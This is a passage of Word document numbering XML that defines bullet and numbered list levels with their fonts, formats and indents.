        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1B8413D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E990EE46">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9D682502">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0BA01DEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE9AF8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D87F60B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="9C6AF922">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="13F2959C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FAE48F2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3EAA92CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="020A93EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E812982C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="72F818BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5F64DC28">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="91F021A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0FC6C87A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="51A23CE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="05A28414">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5B5C54EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4F7491A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4CFA9D2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4D4E1E56">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="50CC01CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B13859C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="18A6EB38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="103DFCAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="6F547BE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2EA0FE82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="87A07C4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="405A31A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="94980E4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DD80153C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="15F4939A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2520CA18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6EE259AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="161B0FE9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="431C1DE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="692ACA84">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B5921432">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="032C031E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0B1EFE2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9E049FA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9574FBB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3ADC6FC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CFA22B7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="186A4C17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7C868F0C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="29DEA7E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="06462F6E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="16E23868">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="36A020A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0794F252">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C8806092">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="47668846">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5082FD56">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="18FC3FFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A728155E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="389AB6E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7BA05036">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A10CCC7A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="F0EC4E50">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CE66CB30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="94CA72EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0DEEE056">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D6F6251C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="19382DAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="E56A9024">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1CFA18CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="41720820">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="26F4CD00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3334A4AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D2C69522">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C51412D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="97144B40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6A526568">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="195D3031"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="F7BA4098">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8B2CA396">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3DCAF73A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1C8C6DBA">
      <w:start w:val="1"/>
